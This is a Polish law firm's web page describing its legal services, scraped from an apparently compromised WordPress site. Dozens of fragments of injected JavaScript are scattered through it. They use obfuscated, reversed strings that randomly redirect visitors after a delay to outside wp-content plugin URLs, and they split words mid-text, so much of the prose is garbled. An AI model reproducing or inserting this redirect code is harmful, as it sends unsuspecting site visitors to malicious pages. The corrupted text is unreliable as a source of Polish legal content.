) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to;padding: 0px;”]
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to;padding: 0px;”]
 
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to;padding: 0px;”]

Usługi prawne w naszej kancelarii


) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to;padding: 0px;”]

Kompleksowa obsługa prawna firm i osób prywatnych

 

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to;padding: 0px;”]
    ) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top” class=”bef”]
  • Specjalizacja
  • Konsultacje Prawne
  • Pisma Procesowe
  • Sądy administracyjne
  • Spółki i spadki

Nasza kancelaria świadczy usługi prawne dla klientów indywidualnych i dla firm. W ramach naszej działalności zapewniamy kompleksową obsługę prawną z zakresu:
prawa cywilnego,
prawa handlowego,
prawa gospodarczego,
prawa pracy,
reprezentacji przed organami administracji publicznej i reprezentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towanie podatników przed Sądami Administracyjnymi.

Proponujemy również usługi z zakresu rejestracji spółek prawa handlowego oraz sporządzania pism i dokumentów dotyczących obsługi prawnej podmiotów prawa handlowego.

PRAWO GOSPODARCZE I HANDLOWE

Sprawy dotyczące kontraktów zawieranych przez przedsiębiorców, opiniowanie umów handlowych, badanie prawidłowości postępowania podmiotu w zakresie prawa handlowego, obsługi transakcji handlowych.

SPORZĄDZANIE PISM PRAWNYCH

Nasza kancelaria prawna świadczy najwyższej, jakości usługi w zakresie sporządzania pism procesowych, sądowych, dokumentów urzędowych, umów gospodarczych, umów handlowych, umów najmu, umów dzierżawy i innych.

Nasza kancelaria świadczy również usługi polegające na określaniu drogi postępowania w danej sytuacji, jak również proponowaniu sposobu rozstrzygnięcia danego problemu prawnego.
Postępowania te dotyczą m.in.:

prawa gospodarczego,
prawa rodzinnego,
prawa spadkowego,
prawa rzeczowego,
prawa podatkowego,
prawa finansowego.

Nasze konsultacje dotyczyły m.in.:
postępowania rozwodowego,
postępowania alimentacyjnego,
postępowania w zakresie sporu między przedsiębiorcami,
postępowań dotyczących sposobu rozstrzygania problemów w zakresie nadzwyczajnych zgromadzeń wspólników w spółkach z ograniczoną odpowiedzialnością,
likwidacji spółek jawnych i spółek z o.o. w sytuacji sporu między wspólnikami,
przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towania dokumentacji dot. zniesienia współwłasności nieruchomości.

Konsultacje prawne bardzo częstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to kończą się przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towaniem odpowiednich pism procesowych ale są też sytuacje, w których naszą rolą jest wyjaśnienie klientoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towi, ogólnego sposobu postępowania w danej sytuacji, jak również naświetlenie kierunku rozwiązań prawnych w dziedzinie interesującej klienta.

ODZYSKIWANIE NALEŻNOŚCI

Postępowania nakazowe, upominawcze, pisma przedprocesowe, pisma komornicze w zakresie odzyskiwania należności dotyczących firm oraz osób fizycznych.

ODWOŁANIA OD DECYZJI O CHARAKTERZE

-rentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towym
– emerytalnym
– z zakresu prawa pracy i szeroko pojętego systemu ubezpieczeń społecznych.

Nasza kancelaria przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towuje wiele pism procesowych, a także pism w toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toku postępowania z różnych dziedzin prawa gospodarczego, prawa rodzinnego i opiekuńczego, prawa rzeczowego oraz prawa spadkowego.
Pisma te toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to m.in.:
pozwy wzajemne,
pozwy o świadczenia pieniężne,
pozwy o zapłatę,
pozwy o rozwiązanie umowy i zapłatę.

Z zakresu prawa rodzinnego przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towywaliśmy m.in.:
pozwy o rozwód,
pozwy o orzeczenie separacji z winy jednego z małżonków,
pozwy o ustanowienie rozdzielności majątkowej między małżonkami,
pozwy o uchylenie obowiązku alimentacyjnego ojca względem dziecka pełnoletniego,
pozwy o ustalenie obowiązków alimentacyjnych.

Z zakresu prawa rzeczowego sporządzaliśmy m.in.:
pozwy dot. ochrony naruszonego posiadania,
pozwy o wydanie nieruchomości,
pozwy dot. ustanowienia służebności drogi koniecznej.

Z zakresu prawa spadkowego opracowywaliśmy m.in.:
pozwy o zachowek
pozwy o wykonanie zapisu
pozwy o ustalenie nieważności testamentu

W zakresie prawa gospodarczego sporządzaliśmy wiele pozwów i wniosków w tym m.in.:
pozwy o podjęcie zawieszonego postępowania,
pozwy dot. pozbawienia wykonalności tytułu wykonawczego,
pozwy o przywrócenie uchybionego terminu,
pozwy o przedłużenie terminu sądowego,
pozwy o zabezpieczenie kosztów procesu,
pozwy o zawieszenie postępowania z uwagi na fakt, że w danej sprawie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toczyło się inne postępowanie w wyniku, którego zależało rozstrzygnięcie sprawy,
prowadziliśmy postępowania dot. rejestracji spółek jawnych, komandytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towych i spółek z o.o.
w Sądach Gospodarczych.

Przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towywaliśmy bardzo wiele pozwów w sprawach gospodarczych w zakresie postępowania nakazowego, a także odpowiedzi na pozew w sprawach gospodarczych.
Prowadziliśmy również postępowania dotyczące likwidacji spółek jawnych i spółek z o.o.

Kancelaria przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towywała także wiele pism związanych z zaskarżaniem orzeczeń sądowych w tym m.in. apelacje od wyroków Sądów Rejonowych, Sądów Okręgowych, skargi na przewlekłość postępowania.

Prowadziliśmy również szczególnie skomplikowane sprawy dot. wznowienia postępowania zakończonego prawomocnym wyrokiem.

Sporządzaliśmy także wiele pism w postępowaniu nieprocesowym z zakresu m.in.:
prawa rodzinnego i opiekuńczego,
prawa rzeczowego (m.in. wniosek o rozgraniczenie nieruchomości, a także wniosek o stwierdzenie zasiedzenia własności nieruchomości).

W postępowaniu wieczystoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-księgowym przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towywaliśmy wnioski:
o założenie księgi wieczystej,
o założenie księgi wieczystej dla własnościowego lokalu spółdzielczego,
o wykreślenie hipoteki,
o wpis hipoteki zwykłej

Z zakresu postępowania w sprawach sądowo-administracyjnych sporządzaliśmy:
skargi,
pisma procesowe,
zażalenia,
skargi kasacyjne,
wstrzymanie wykonania zaskarżonego aktu,
wstrzymanie wykonania czynności przez sąd administracyjny.

W toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toku dotychczasowej działalności występowaliśmy wielokrotnie przed sądami administracyjnymi zajmując się sprawami z zakresu zobowiązań podatkowych a także sprawami dotyczącymi PFRON. Sprawy te dotyczyły postępowań przed Wojewódzkim Sądem Administracyjnym w Krakowie i w Warszawie. Dotyczyły zarówno osób fizycznych prowadzących działalność gospodarczą, jak i spółek z ograniczoną odpowiedzialnością

SPÓŁKI

sprawach związanych z zakładaniem, rejestracją spółek, oddziałów
i przedstawicielstw, łączeniem spółek, podziałów, oraz związanych
z przekształcaniem działalności jednoosobowych w spółki z ograniczoną odpowiedzialnością.

SPADKI

Nasza kancelaria oferuje pomoc prawną oraz podatkową w sprawach spadkowych. Doradzamy również w sprawach dotyczących dziedziczenia ustawowego
i testamentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towego, pomagamy przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tować pisma procesowe w tym zakresie, jak również pomagamy rozliczyć sprawy spadkowe pod względem podatkowym. Nasza kancelaria oferuje usługi prawne w zakresie spółek.